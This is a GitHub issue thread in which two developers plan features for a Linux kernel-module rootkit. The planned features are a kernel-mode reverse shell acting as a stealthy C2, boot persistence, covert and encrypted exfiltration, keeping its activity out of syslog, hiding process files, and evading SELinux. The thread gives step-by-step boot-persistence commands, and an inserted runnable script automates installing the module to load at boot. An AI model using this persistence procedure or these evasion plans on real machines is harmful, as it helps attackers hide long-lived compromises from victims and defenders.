reveng_rtkit

[*] Contributing on the TODO LIST

Open loneicewolf opened this issue 1 year ago • 20 comments

Hello @reveng007! First off, nice project, I have to say! Many great links and well structured 👏🏻.

Overview

I plan on contributing to this project; that is, I saw both the Issues and the TODO list you have made, among them:

  • system()-like function (but in kernel)
  • sockets (this one was a bit broad/confusing) - do you want it to be a reverse shell..?
  • Among others.

I plan on contributing to all the TODOs (as, at the time of writing, each Issue and TODO you have listed does not really seem impossible for me to achieve), like adding a system()-like function.

TODO 4# Sockets

For this TODO I need to request some details before I dive in. It is unclear what you want to achieve:

> Adding Linux Kernel Sockets to this LKM rootkit, so that this rootkit acts as an all-rounder. Both as an LKM rootkit as well as a stealthy C2 Server.

On both of these, what exactly do you want to achieve here?

  • "stealthy C2 Server."
  • "this rootkit acts as an all-rounder."

TODO 5# Persistence

As well, this one got me specifically interested in contributing, since it would be a great exercise:

Additional Idea

I have thought of some things to add to your project; some of them are included here (but not limited to):

  • Cryptography, Obfuscation and Steganography.
    • Cryptography - encryption & decryption (like encrypting the sockets so that data is not sent in plain text..)
    • Obfuscation - This is pretty self-explanatory.
    • Steganography - if required by the user (who controls the rootkit), he or she will be able to choose to use steganography as an extra, additional step for security. That is, when exfiltrating something (data, which might be a reverse shell, or something along those lines) it could work by hiding it in normal pictures or just something else.

Note these would take a longer time to make, but I still wanted to point them out.

Edit: I also thought of adding something related to kernel-mode shellcode execution, as it is something I have been working on for some time now. I will see if I have the time, if this would be something of interest.

Have a great day! If any comments, thoughts, problems or concerns arise, please point them out!

loneicewolf · Jan 27 '23 14:01

Of course, it goes without saying: if one or more 'todos' are already done, please point them out so I don't reinvent the wheel.

Thank you.

loneicewolf · Jan 27 '23 14:01

> Of course, it goes without saying: if one or more 'todos' are already done, please point them out so I don't reinvent the wheel.
>
> Thank you.

No TODO list is actually done till now :)

reveng007 · Jan 27 '23 17:01

> No TODO list is actually done till now :)

edit: I will begin with the easiest one, the system()-like function (but in kernel);

Thank you for the fast reply and have a great continuing day!

loneicewolf · Jan 27 '23 17:01

Thanks a lot for the appreciation! 💯

Thanks again to you for showing interest in contributing to my project 😃

Overview:

  • system()-like function (but in kernel): just to open a new bash/sh prompt, as I have mentioned earlier in the README file.
  • sockets (this one was a bit broad/confusing) - do you want it to be a reverse shell..? Yes, a revshell, but in kernel mode ;)

TODO 4# Sockets:

The rootkit will also act as a revshell (rather, a kernel-mode revshell), just to nullify the use of a usermode revshell for a long time, just for being stealthy.

All-rounder meaning: functionality of a revshell + stealthy as an LKM rootkit.

TODO 5# Persistence:

Actually, I have no idea how to achieve this till now ;( I guess some assembly language will be needed to achieve this stuff...

Cryptography and Obfuscation are really dope ideas 🔥, but Steganography will be dependent upon the scenario/environment of the victim machine, right?

> Note these would take a longer time to make, but I still wanted to point them out.

Not a problem at all, man!!

Again, thanks for providing a helping hand to me :)

> I also thought of adding something related to kernel-mode shellcode execution, as it is something I have been working on for some time now. I will see if I have the time, if this would be something of interest.

You are most welcome to add those if you want to. That would really help this project attract more public attention!!

Thank you @loneicewolf 🤗, have a nice day!!

reveng007 · Jan 27 '23 17:01

> No TODO list is actually done till now :)
>
> edit: I will begin with the easiest one, the system()-like function (but in kernel);
>
> Thank you for the fast reply and have a great continuing day!

I'm also excited about this 😄 Not a problem at all. Thank you, same to you as well.

reveng007 · Jan 27 '23 17:01

No problem at all. With the Persistence "exercise", as I called it, I meant that I myself would do it, and make (I guess) another Pull Request when it's done.

loneicewolf · Jan 27 '23 17:01

On the Steganography step, I was a bit vague too. Broadly speaking, it "can" be a picture, but it can also be just a covert channel; whatever that might be can be another question (there are loads of methods to achieve this).

Then I guess I have nothing more to add - if there is anything else, just write a new TODO element or reply to me in any issue.

Have a nice day! And keep it up :)

Edit: adding footnotes (related links) so as to clarify what I meant by Cryptography, Obfuscation and Steganography:

https://embeddedsw.net/

https://embeddedsw.net/Randomness_Test_Home.html

https://embeddedsw.net/OpenPuff_Steganography_Home.html

https://embeddedsw.net/MultiObfuscator_Cryptography_Home.html

https://embeddedsw.net/libObfuscate_Cryptography_Home.html

https://embeddedsw.net/Cipher_Reference_Home.html

loneicewolf · Jan 27 '23 17:01

Btw, do you know how to make a custom logger? Like, when we inject it, it creates some logs, right? So I wanted to create a custom logger which can log our kernel prints, instead of syslog logging our rootkit's behaviour. Targeting more OPSEC.

Or another idea was to use macros like KERN_EMERG, KERN_ALERT from the printk.h header, which have a lower log level than the console log level, so that those logs will not be logged by syslog; rather they will be shown in the console, like ctrl + shift + f5/f4 (I don't really remember that particular tty).

But we have to somehow perform proxying of those outputs from the console to our current terminal; that means those kernel prints will work like printf (in C) or like echo in bash.

Did I make any sense?

reveng007 · Jan 27 '23 21:01

Hi again @reveng007!

Thanks for the additional reply;

> Btw, do you know how to make a custom logger? Like, when we inject it, it creates some logs, right? So I wanted to create a custom logger which can log our kernel prints, instead of syslog logging our rootkit's behaviour. Targeting more OPSEC.
>
> Or another idea was to use macros like KERN_EMERG, KERN_ALERT from the printk.h header, which have a lower log level than the console log level, so that those logs will not be logged by syslog; rather they will be shown in the console, like ctrl + shift + f5/f4 (I don't really remember that particular tty).
>
> But we have to somehow perform proxying of those outputs from the console to our current terminal; that means those kernel prints will work like printf (in C) or like echo in bash.
>
> Did I make any sense?

Uhm, the last sentence is flawless - sorry, I am having a bit of trouble following what you are trying to say; I will try (below):

  • You want to make a "logger" of some sort (that logs everything from what the operator does with the rootkit, what the rootkit's output is, and so on), right?
  • Macros like KERN_ALERT are (according to your text - again, if I understand you correctly) to hide the output..? If you want to hide the output, why not just comment it out? (Or, if you need the outputs but still don't want them to be "so plaintext", maybe log them somewhere else? Perhaps encrypted?)
  • "Proxy the outputs from console to current terminal" - here I do not follow at all, I think.. Do you want to redirect the output from something to something else..? Sorry, please clarify.

And soon I will have to head home for the night; I'll come back online tomorrow.

Can you perhaps make an example of each of them (draw a diagram, or some example code, maybe in another language, to demonstrate..?) if it is difficult explaining. :)

loneicewolf · Jan 27 '23 21:01

I think I do understand the "logging the output to another tty" part - so you have to press ctrl+shift+fX (where X is 5, 4, ..., 2, 1) to see the output, correct? If this is not a correct understanding, I think you have to elaborate, sorry :)

Have a good night!

loneicewolf · Jan 27 '23 22:01

> I think I do understand the "logging the output to another tty" part - so you have to press ctrl+shift+fX (where X is 5, 4, ..., 2, 1) to see the output, correct? If this is not a correct understanding, I think you have to elaborate, sorry :)
>
> Have a good night!

You are right, exactly! But the thing is, that will be quite hectic, right? Searching for the value of X in ctrl+shift+fX for every machine once it is injected into the kernel. For every machine, that value of X is different, if I remember correctly.

Same to you too! :)

reveng007 · Jan 28 '23 01:01

> You want to make a "logger" of some sort (that logs everything from what the operator does with the rootkit, what the rootkit's output is, and so on), right?

Yes

> Macros like KERN_ALERT are (according to your text - again, if I understand you correctly) to hide the output..? If you want to hide the output, why not just comment it out? (Or, if you need the outputs but still don't want them to be "so plaintext", maybe log them somewhere else? Perhaps encrypted?)

If I comment out the comment lines, then how will I know that those instructions got successfully executed in the kernel? Am I right? According to this link, "Any log messages with levels less than this (that is, of higher priority) will be printed to the console, whereas any messages with levels equal to or greater than this will not be displayed."

I'm talking about this!

> "Proxy the outputs from console to current terminal" - here I do not follow at all, I think.. Do you want to redirect the output from something to something else..? Sorry, please clarify.

Exactly. I want to redirect the output from the console to the current terminal we are having as the operator. Does this make sense now?

> And soon I will have to head home for the night; I'll come back online tomorrow.

Not a problem 👍🏼

> Can you perhaps make an example of each of them (draw a diagram, or some example code, maybe in another language, to demonstrate..?) if it is difficult explaining. :)

If more explanation is needed, please feel free to ask me 👍🏼

reveng007 · Jan 28 '23 01:01
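To make the console_loglevel rule quoted above concrete, here is an added POSIX shell example (it is not code from the reveng_rtkit project or from either participant). It maps the KERN_* macros from include/linux/kern_levels.h to their numeric levels, reads the first field of /proc/sys/kernel/printk (console_loglevel) and reports whether a printk() at a given level would be echoed to the console. The "4 4 1 7" setting used in the demo is a constructed sample matching a common distribution default. One point worth keeping in mind for the OPSEC goal in this thread: console_loglevel only decides whether a line is echoed to the console; printk() appends every message to the kernel ring buffer regardless of level, and that buffer is what dmesg, journald and syslog's kernel log input read.

```shell
#!/bin/sh
# Added example, not reveng_rtkit project code: check whether a printk() at a
# given KERN_* level would be echoed to the console under a given
# /proc/sys/kernel/printk setting. The first field of that file is
# console_loglevel; a message reaches the console only if its level number
# is strictly lower. It is appended to the kernel ring buffer either way,
# and that buffer is what dmesg, journald and syslog's kernel input read.

# KERN_* macro name -> numeric level (include/linux/kern_levels.h)
kern_level() {
    case "$1" in
        KERN_EMERG)   echo 0 ;;
        KERN_ALERT)   echo 1 ;;
        KERN_CRIT)    echo 2 ;;
        KERN_ERR)     echo 3 ;;
        KERN_WARNING) echo 4 ;;
        KERN_NOTICE)  echo 5 ;;
        KERN_INFO)    echo 6 ;;
        KERN_DEBUG)   echo 7 ;;
        *) echo "unknown level: $1" >&2; return 1 ;;
    esac
}

# console_loglevel [printk-line]: first field of /proc/sys/kernel/printk, or of
# the given line in the same "console default minimum boot-default" format.
console_loglevel() {
    line="${1:-$(cat /proc/sys/kernel/printk)}"
    set -- $line
    echo "$1"
}

# reaches_console KERN_xxx [printk-line]: exit 0 if the message would be
# printed on the console, 1 if it only lands in the ring buffer.
reaches_console() {
    lvl="$(kern_level "$1")" || return 2
    con="$(console_loglevel "$2")"
    [ "$lvl" -lt "$con" ]
}

# Demo against a constructed setting "4 4 1 7" (a common distro default):
# KERN_ERR (3) and more urgent reach the console, KERN_WARNING (4) and below
# do not.
demo() {
    for m in KERN_EMERG KERN_ALERT KERN_ERR KERN_WARNING KERN_INFO KERN_DEBUG; do
        if reaches_console "$m" "4 4 1 7"; then
            echo "$m: console + ring buffer"
        else
            echo "$m: ring buffer only"
        fi
    done
}

demo
```

Run it as `sh printk_levels.sh` for the demo, or source it and call `reaches_console KERN_INFO` with no second argument to test a level against the live setting of the current machine.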

Good morning!

Yes, thank you @reveng007. I'll check that link; I'm on the train now so it will take a while, but thanks for being patient and so (very) quick in responding!

loneicewolf · Jan 28 '23 04:01

> Good morning!
>
> Yes, thank you @reveng007. I'll check that link; I'm on the train now so it will take a while, but thanks for being patient and so (very) quick in responding!

Hey, not a problem. You are only helping me out by contributing to my project. So thanks to you :) @loneicewolf

reveng007 · Jan 28 '23 05:01

Hello @reveng007, now I have made up a kind of plan. I will, as said, be slow on this, not only because of various factors such as the different kernel version the rootkit is using, safe coding (since, even if we code a rootkit in the kernel, we should still strive to make it as "stable" and "reliable", ironically speaking, as possible), and so on;

The Persistence

Regarding the Persistence step, a naive approach (I guess you & everyone else think of this first when thinking about rootkit persistence) is just to "load it at startup" like any other loadable kernel module (which, as a start, might be just placing a copy in a folder that has modules to load at boot); so I think the actual persistence wouldn't be so complex, but the "exercise" here would be the steps required to make it harder to detect (relatively speaking).

Blog feedback

And I have checked your blog (comprehensive, I have to tell you - keep it up! One minor improvement could be to make the subtitles more "visible", because I had to scroll quite a lot to get to a part you referred me to, but other than that it's really well structured). :)

Wrap up

So, basically I will in time prepare (not all at the same time, but one by one):

  • [ ] The system()-like function in the kernel;
  • [ ] The Sockets (reverse shell, ...)
  • [ ] The Persistence
  • [ ] I will take on the Additional ideas (cryptography, obfuscation, steganography) last.

I wish you a nice continuing day! This will be a fun project to contribute to! 👍🏻

loneicewolf · Jan 28 '23 14:01

Yes, safe coding is required, but I guess before that we need our concepts to work. After that we should stabilize our code based on that.

Persistence

This can be helpful, although I don't have good knowledge of asm; in this case it may require us to use kernel-mode asm. Link: https://programmer.group/inject-your-rootkit-code-into-a-linux-kernel-module.html

Yes, our target will be more stealth!

"'load it at startup' like any other loadable kernel module" is easy:

We can leverage `initramfs` to set up the rootkit to load automatically at boot time.

With sudo:

  1. Add the rootkit (without .ko) to /etc/modules
  2. Copy the rootkit LKM to: /lib/modules/5.15.0-58-generic/kernel/drivers/<any driver/module folder>
  3. depmod -a
  4. update-initramfs -u

Blog feedback:

Thanks a lot! Actually, at that time I was a total noob; I didn't know anything about the kernel, LKMs, even the concept of an OS and usermode C was unknown to me. I have made it comprehensive just to log my learning path. But at last I decided to make it public so that someone like me can learn to create a rootkit from scratch even if they don't really have knowledge of all those basics, without getting intimidated by other high-level blogs/posts.

I have to find out how to add that feature so that one click on a topic enables the user to easily navigate to that particular topic.

Wrap Up:

In this section, I don't really have to add anything; everything that we said is perfect! Except one thing, although it is my query. Do you have any idea how to do this?

  • Hiding process files completely. Our hidden process files can be accessed to open/read. If someone does ls, they can easily open them.
  • Capabilities to evade SELinux.

> I wish you a nice continuing day! This will be a fun project to contribute to! 👍🏻

Same to you, my man! 👍🏼

reveng007 · Jan 28 '23 20:01
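The four boot-time loading steps above as a script, added here as an example (it is not code from the reveng_rtkit project or from either participant). It assumes a Debian/Ubuntu system, since /etc/modules and update-initramfs are initramfs-tools conventions, derives the module directory from `uname -r` instead of hard-coding 5.15.0-58-generic, and treats the module filename reveng_rtkit.ko and the drivers/misc subdirectory as placeholders. `check_lkm` is the verification an operator (or a defender looking for exactly this kind of persistence) would run afterwards; it also prints the kernel's module signature enforcement flag, because a kernel that enforces module signatures will refuse an unsigned .ko at boot no matter how it was placed. DRY_RUN=1 prints the privileged commands instead of running them, so the script can be inspected without root.

```shell
#!/bin/sh
# Added example, not reveng_rtkit project code: the boot-time loading steps
# from the comment above as a script, plus a check to run afterwards.
# Assumes Debian/Ubuntu (initramfs-tools, /etc/modules). The module name
# reveng_rtkit.ko and the drivers/misc subdirectory are placeholders.
# DRY_RUN=1 prints each privileged command instead of executing it.

DRY_RUN="${DRY_RUN:-0}"

# Execute a command, or echo it when dry-running.
run() {
    if [ "$DRY_RUN" = 1 ]; then
        echo "+ $*"
    else
        "$@"
    fi
}

# Destination directory inside the running kernel's module tree.
# $1: subdirectory to blend into, e.g. drivers/misc
module_dest_dir() {
    echo "/lib/modules/$(uname -r)/kernel/$1"
}

# persist_lkm <path/to/module.ko> <kernel subdir>
#   1. list the module (without .ko) in /etc/modules
#   2. copy the .ko into the module tree
#   3. depmod -a
#   4. update-initramfs -u
persist_lkm() {
    ko="$1"
    name="$(basename "$ko" .ko)"
    dest="$(module_dest_dir "$2")"
    run sh -c "grep -qx '$name' /etc/modules || echo '$name' >> /etc/modules"
    run install -m 0644 "$ko" "$dest/$name.ko"
    run depmod -a
    run update-initramfs -u
}

# check_lkm <module name>: show where the module is referenced on this host.
# sig_enforce=Y means the kernel rejects unsigned modules, so the steps above
# would not survive a reboot without a signing key the kernel trusts.
check_lkm() {
    name="$1"
    grep -qx "$name" /etc/modules 2>/dev/null && echo "/etc/modules: listed"
    modinfo -n "$name" >/dev/null 2>&1 && echo "modules.dep: resolvable"
    [ -r /sys/module/module/parameters/sig_enforce ] &&
        echo "sig_enforce: $(cat /sys/module/module/parameters/sig_enforce)"
    lsmod | awk -v m="$name" '$1 == m { print "lsmod: loaded" }'
}

# usage: DRY_RUN=1 sh persist.sh ./reveng_rtkit.ko drivers/misc
if [ $# -ge 1 ]; then
    persist_lkm "$1" "${2:-drivers/misc}"
    check_lkm "$(basename "$1" .ko)"
fi
```

Without DRY_RUN the script needs root for every step of `persist_lkm`; `check_lkm` on its own runs unprivileged and is the part worth keeping in a host-audit script, since a module name appearing in /etc/modules and modules.dep that no package owns is exactly the artifact this procedure leaves behind.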

Regarding the last 2 points, it depends, because "completely" is not possible. But I assume you mean as close as possible to "complete". I mean, obviously nothing is perfect or 100% secure (this is obvious).

But - I mean, you could do some checks: instead of only "hiding a file that has a prefix", you can "hide the file iff it contains some specific data", like some metadata to match - for example the file is in a particular location, at a particular time, made by a particular user (and so on), or has some keyword inside of it (this can be whatever, from a first line of random letters to some cipher or whatever it might be). Of course this is an extremely broad thing, because there are loads of ways you can program a rootkit, or even just program one "thing";

so it depends on the situation very much.

Regarding the blog

> Actually, at that time I was a total noob; I didn't know anything about the kernel, LKMs, even the concept of an OS and usermode C was unknown to me.

Respect! Hard worker ^_^ We all begin somewhere, and I don't like to use the word "noob", by the way; but have a nice night! ☕

loneicewolf · Jan 28 '23 20:01

Hmmm!! Got your point....

Thanks a lot 😊 Good night to you as well!

reveng007 · Jan 28 '23 21:01

Update:

@reveng007 Hi!

This was quite the delay, I have to admit. I will hopefully begin very soon with the proofs of concept (as we always start with), then make it more stable. I have researched some topics and looked into your blog (because of various factors, like it being long and a bit all-consuming to read, and so on, I had to re-write certain parts, on my side that is. I don't really have anything to contribute to the blog post, as I think it's quite well structured. And as you point out in this repo, this is not for the latest kernels, but a specific one.)

Briefly speaking, I have reviewed some stuff I would need in order to make all these contribution "points" (persistence, kernel-mode system() function, etc.) and will begin with PoCs very shortly.

You can close this if you want, as I will probably (time permitting) make new pulls/issues for each "part", as I always do.

Wishes!

loneicewolf · Feb 13 '23 16:02

No worries... Take your time... I also haven't had time to put into the Linux kernel...

Mostly spending time on Windows... Thanks again!

All the very best :)

reveng007 · Feb 13 '23 16:02